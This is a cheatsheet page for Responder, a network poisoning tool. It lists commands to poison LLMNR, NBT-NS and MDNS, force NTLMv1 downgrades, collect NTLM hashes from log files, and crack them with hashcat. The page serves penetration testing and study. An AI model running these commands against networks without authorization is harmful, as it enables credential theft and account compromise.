__ _______________________ _________._________________________ \_ _____/ \______ \ / _ \ / _____/ / _____/ | | \_ _____/ | __) | _/ / /_\ \ / \ ___ / \ ___ | | | __)_ | \ | | \ / | \ \ \_\ \ \ \_\ \ | |___ | \ \___ / |____|_ / \____|__ / \______ / \______ / |_______ \ /_______ / \/ \/ \/ \/ \/ \/ \/

responder Cheatsheet

← Back to cheatsheets

← Home

Responder is a LLMNR, NBT-NS, and MDNS poisoner. Answers name resolution requests to capture authentication hashes. Essential for network penetration testing and credential harvesting in Windows environments.

Basic Usage

  • responder -I eth0 - Start on interface
  • responder -I eth0 -rdw - Enable all protocols
  • responder -I eth0 -A - Analyze mode (no poisoning)
  • responder -I eth0 -v - Verbose mode

Protocol Options

  • -r - Enable Responder for LLMNR
  • -d - Enable Responder for NBT-NS
  • -w - Enable Responder for MDNS
  • -f - Fingerprint hosts
  • -P - Force NTLMv1
  • -D - Force NTLM downgrade

Service Options

  • -S - Enable HTTP server
  • -U - Enable UPnP server
  • -F - Force wpad auth
  • -a - Enable SMB server
  • -6 - Enable IPv6

Output Options

  • -v - Verbose output
  • -A - Analyze mode (no poisoning)
  • -i file - Respond to IPs from file
  • -e IP - External IP for wpad
  • -b - Basic authentication
  • -l file - Log file

Common Examples

Basic Poisoning

responder -I eth0

Start on interface with defaults.

All Protocols

responder -I eth0 -rdw

Enable LLMNR, NBT-NS, and MDNS.

Analyze Mode

responder -I eth0 -A

Monitor without poisoning.

Force NTLMv1

responder -I eth0 -P

Force weaker NTLMv1 hashes.

With HTTP Server

responder -I eth0 -S

Enable HTTP authentication server.

Verbose

responder -I eth0 -v

Detailed output.

Specific IPs

responder -I eth0 -i targets.txt

Only respond to listed IPs.

Full Options

responder -I eth0 -rdw -S -v

Enable all features with verbose.

Captured Hashes

  • /usr/share/responder/logs/ - Log directory
  • HTTP-NTLMv2-*.txt - HTTP hashes
  • SMB-NTLMv2-*.txt - SMB hashes
  • FTP-NTLMv2-*.txt - FTP hashes
  • LDAP-NTLMv2-*.txt - LDAP hashes

Hash Format

  • username::domain:hash:hash - NTLMv2 format
  • Can be cracked with hashcat or john
  • hashcat -m 5600 hash.txt wordlist.txt - Crack NTLMv2

Tips

  • Use on internal networks for best results
  • Enable all protocols (-rdw) for maximum coverage
  • Use -A mode first to analyze traffic
  • Check logs directory for captured hashes
  • Use -P to force NTLMv1 (easier to crack)
  • Combine with hashcat for password cracking
  • Essential for network penetration testing
  • Works best in Windows AD environments